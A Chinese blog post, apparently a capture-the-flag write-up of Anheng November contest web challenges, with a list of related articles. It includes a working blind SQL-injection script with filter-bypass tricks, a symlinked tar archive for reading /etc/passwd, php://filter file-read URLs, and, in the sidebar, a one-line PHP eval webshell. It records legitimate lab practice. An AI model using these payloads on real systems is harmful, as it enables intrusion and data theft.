安恒11月赛Web题目复现

最新推荐文章于 2023-07-08 11:32:33 发布
最新推荐文章于 2023-07-08 11:32:33 发布
阅读量2.3k 收藏 7
点赞数 2
分类专栏: CTF Web 文章标签: 安恒月赛 CTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011377996/article/details/84658346
版权

考完网络安全跟算法就赶紧来复现一下题目,又学到了一波知识了23333,这次题目的质量贼好

手速要快

上一个月的原题,不多说,直接在http头里面找到对应的password登陆以后直接就是关于页面上传的功能,这里的上传是服务器端的问题
直接上传一个非php结尾的文件即可解析
FmMnPS.md.png
然后可以直接输入相关命令获取flag不多说
FmMMvj.png

FmM1rn.md.png

好黑的黑名单

这个题目质量很好,至少我以前都没见过这种盲注,里面利用了between的几个特性,又学到了2333
右键查看源代码就会发现很明显的id参数,这里的思路就是SQL注入
FmM3bq.png
尝试对其进行注入,发现其明显是存在过滤的,一旦遇到关键字就会返回这么坏?想让我下面给你吃吗?XD的字样
如果查询不到的话就会返回想让我下面给你吃?
fuzz一下大概发现过滤的东西有空格,*,union,单引号等等,所以我们就不可以用内联的注入,这里空格我们可以用%0a去绕过,测试一下
FmQ9oV.md.png
下面就是这次盲注的重点知识利用between and
FmQFWF.png
上面两个执行语句就解释了为什么可以这样做,当select的值在between之间就会返回1,而且前面选择出来的词语会按照顺序匹配,第一个匹配正确的话就会匹配第二个
FmQkz4.png
而且还可以固定好最后一位,然后前面一步步去字母给找出
FmQVy9.png
但是把数据库跑出来以后后面继续加上空格还是会显示1,这在写脚本的时候得注意一下,还有几点得注意下,单引号过滤掉可以使用16进制,另外information_schema.tables被过滤可以使用information_schema%0a.tables这样去绕过

#!/usr/bin/python
# Author:0verWatch


import requests

burl = 'http://101.71.29.5:10008/show.php?id=-1'

flag  = 0
ans  = ''
result = ''



for i in range(40):
	if flag == 0:
		for j in range(127,32,-1):
			if j == 33:
				flag = 1
			#payload = '%0aor%0a(select%0adatabase()%0abetween%0a0x'+result+hex(j)[2:4]+'%0aand%0a0x7a)' #web
			#payload  = '%0aor%0a(select%0a(select%0agroup_concat(table_name)%0afrom%0ainformation_schema%0a.tables%0awhere%0atable_schema%0abetween%0a0x776562%0aand%0a0x776562)%0abetween%0a0x'+result+hex(j)[2:4]+'%0aand%0a0x7a)'  #admin,flaggg,menu
			#payload = '%0aor%0a(select%0a(select%0agroup_concat(column_name)%0afrom%0ainformation_schema%0a.columns%0awhere%0atable_name%0abetween%0a0x666c61676767%0aand%0a0x666c61676767)%0abetween%0a0x'+result+hex(j)[2:4]+'%0aand%0a0x7a)'  #id,f1agg
			payload = '%0aor%0a(select%0a(select%0af1agg%0afrom%0aflaggg)%0abetween%0a0x'+result+hex(j)[2:4]+'%0aand%0a0x7a)'
			url = burl+ payload
			con  = requests.get(url)
#			print(con.text)
			if u"郑州" in con.text:
				ans = ans + chr(j)
				print(result)
				result = result + hex(j)[2:4]
				break

print(ans)

愉快地拿到flag
FmQndx.md.png

interesting web

这个题目上来就发现有注册,登录,找回密码的功能,通常我们需要注册看一下
登陆之后发现上传页面,但是根据页面一开始提示说明管理员才可以上传tar包,这里就容易想到软连接,但是首先我们得以admin身份登录,这时候根据http可以发现这应该是flask框架写的web
FmQlWD.png

这里有一个点就是flask框架的session可以在浏览器端查看,并且可以读取里面的token值,
FmQGyd.md.png
这东西可以利用在找回密码的功能上面
FmQJOA.md.png
这里面的token值我们可以用来直接修改admin的密码,这东西恰好就是修改密码需要的东西
然后再以admin身份登录,上一个软连接的tar包,先构造一下tar包

ln -s /etc/passwd 2222222.jpg
tar cvfp 233.tar 2222222.jpg

上传后tar包解压,然后curl一下该图片地址获取flag
FmQDSg.md.png

image up

一上来就是个登录页面其实这个登录页面没有用,你随便输如都可以登录到后台上传页面
FmQgwq.md.png
可以看到url,可能存在文件包含,尝试一下读取文件,可以读到一下index以及upload页面
http://101.71.29.5:10007/index.php?page=php://filter/read=convert.base64-encode/resource=index
http://101.71.29.5:10007/index.php?page=php://filter/read=convert.base64-encode/resource=upload

index.php

<? php
if (isset($_GET['page'])) {
   
 if (!stristr($_GET['page'], "..")) {
   
   $page = $_GET['page'].".php";
   include($page);
 } else {
   
   header("Location: index.php?page=login");
 }
} else {
   
 header("Location: index.php?page=login");
这里的代码验证不需要任何检验就可以登录

<? php $error = "";
$exts = array("jpg", "png", "gif", "jpeg");
if (!empty($_FILES["image"])) {
   
 $temp = explode(".", $_FILES["image"]["name"]);
 $extension = end($temp);
 if ((@$_upfileS["image"]["size"] < 102400)) {
   
   if (in_array($extension, $exts)) {
   
     $path
最低0.47元/天 解锁文章
0verWatch
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2018安恒11月赛-Web writeup
CoolD's Blog
11-28 2896
心态炸了
安恒赛php_安恒11月赛周周练writeup
weixin_39881513的博客
12-21 313
前言11月赛 完美错过时间,正好有周周练,基本都是一样月赛web,记录下write up手速要快这题是10月月赛中的一题,直接看我上次的writeup:安恒月赛(十)web-2题writeup,这里不重复了image_upimage.png随意输入username和password登陆,image.png随意尝试上传了文件,好像只能jpg结尾,上传后无回显任何内容。page=upload当前页...
安恒11活动题目
suddenlyTW的博客
11-12 901
  由于是昨天的题目,今天链接已经无法点开了,所以通过其他大神的地方把题扣了过来 web1: 代码如下:   &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;35){ die("Long."); } ...
CTF-安恒18年十一月月赛部分writeup
weixin_33786077的博客
12-14 615
安恒十一月月赛writeup 昨天做了一下十一月的题目,不才只做出来几道 签到web1 这个是十月的原题,因为忘了截图所以只能提供思路 Web消息头包含了登陆框的密码 输入密码后进入上传页面,上传一句话木马1.jpg, <?php @eval($_POST['cmd']);?> 使用burp将上传文件名改为1.php.jpg 然后post数据发现已经getshel...
2018-2019安恒web赛题集合(不完整版)
吃肉唐僧的博客
11-03 3452
前一段时间打安恒杯,需要集训一下之前安恒杯的题目 但是发现安恒杯赛事虽多,但是都分布得很散乱 官方没整理出一个顺序来,让人无从学起, 而且由于web题很难复现,writeup都很难找, 目前,整理了一些web方向的题目, 如果觉得给出来的writeup不详细, 根据题目顺腾摸瓜去找更多题解就行了 目录 2017夏季预赛 根据IP查DNS 编辑器泄露 babywaf 总...
安恒11月赛web题目-ezsql详细记录
weixin_30463341的博客
11-29 428
  通过此题目可以学习到   1.通过load_file+like来盲注获取文件内容   2.php魔术方法__get函数的用法   3.bypass linux命令过滤      题目中给了注册和登录的功能,没有源码泄露      先注册一个用户看下进入用户界面有什么其他的功能,此时题目中除了显示用户名和id号以外没有其他的功能,那么目的很明确,应该是sql注入题目,尝试了s...
安恒月赛题目参赛源码+项目说明.zip
最新发布
01-23
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。 ...安恒月赛题目参赛源码+项目说明.zip
2018-10月安恒逆向题目
10-29
2018年10月安恒月赛逆向题目
安恒明鉴web漏洞扫描器
01-20
安恒明鉴Web漏洞扫描器】是一款专业的网络安全工具,主要针对Web应用程序的安全性进行深度检测,以发现潜在的漏洞并帮助企业或个人提前预防网络攻击。这款扫描器使用了先进的扫描技术和策略,能够自动化地执行多种...
安恒8月应急响应题目回顾-附件资源
03-05
安恒8月应急响应题目回顾-附件资源
2021-08-08ctf中的上传upload题目.user.ini绕过后缀黑名单过滤(同文件夹下有php文件突破口)
qq_45290991的博客
08-08 1159
从SUCTF 2019 CheckIn 浅谈.user.ini的利用 / 2019-08-28 08:59:00 / 转自loong大佬-来自先知社区 ...
上传验证绕过全解析
weixin_33941350的博客
04-19 670
目录 0x01 客户端验证绕过(javascript 扩展名检测)0x02 服务端验证绕过(http request 包检测) - Content-type (Mime type) 检测 0x03 服务端验证绕过(扩展名检测) - 黑名单检测 - 白名单检测 - .htaccess 文件攻击 0x04 服务端验证绕过(文件完整性检测) ...
青少年CTF-ezsql-题目解析
zxsctf的博客
01-07 618
username处加反斜杠转义单引号,造成逃逸,后面可控,成为注入点,payload:or password regexp binary {}#通过探测发现过滤了select、union、'、"、、=、like、and等。利用regexp进行匹配猜测数据,还需要用binary关键字来区分大小写。进入提示,发现要我们登陆,点击确定后跳转到了login.php目录。题目的考点应该是本题考点为MySQL regexp盲注了。题目来源:克拉玛依市第一届网络安全技能大赛。
基于CTFTraining在CTFd部署Web题目
Welcome To Myon'Blog !
07-08 1941
基于CTFTraining在CTFd部署Web题目 docker的使用,靶场搭建
安恒月赛WriteUp-2018.12
BlusKing
12-22 2887
安恒月赛WriteUp2018-12月   WEB1-easy: web1反序列化   一打开就显示了源代码:  &lt;?php   @error_reporting(1); include 'flag.php'; class baby {        public $file;     function __toString()           {      ...
安恒月赛writeup 2019年1月
SsMing的博客
01-26 2932
  目录 web1 pwn2 misc1 misc2 reverse1 crypt1 新的一年,各位师傅太强了 web1 访问后看见源码 &lt;?php @error_reporting(1); #include 'flag.php'; class baby { protected $skyobj; public $aaa; pu...
流量分析——安恒八月月赛CTF
xiaogaoxiaoyuan的博客
01-09 3475
一、题目背景 某公司内网网络被客渗透,简单了解,客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题 二、关卡列表 1 某公司内网网络被客渗透,请分析流量,给出客使用的扫描器 2 某公司内网网络被客渗透,请分析流量,得到客扫描到的登陆后台是(相对路径即可) 3 某公司内网网络被客渗透,请分析流量,得到客使用了什么账号密码登陆了web后台(形式:
ctfd平台搭建体会
yida223的博客
03-13 1366
环境 cenOS7.2 CTFd_V2.0 10.2.22-MariaDB 昨天就开始搭建这个平台,但发现一直不成功,网站就是运行不了。 今天下午重置了系统盘,初始化系统盘继续尝试 看网上的步骤,命令一步一步来运行,仔细观察。 发现了第一个坑,Mysql-python教程里sql是小写,其实系统要求要大写。昨天就是这个漏装了。 但运行serve.py的时候发现报错,看了下错误说明,发现...
PHP数据库操类EZSQL介绍
亦风的家园
05-15 646
Wordpress中的数据库操作是引用EZSQL这个类的,今天我们就介绍一些这个类和Wordpress中的WPdb类。 EZSQL类介绍: ezsql是一个小型的快速的数据库操作类,可以让你很容易地用PHP操作各种数据库( MySQL、oracle8/9 、interbase、FireBird、PostgreSQL、MS-SQL、sqlite、sqlite C++)。 在你的脚本

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值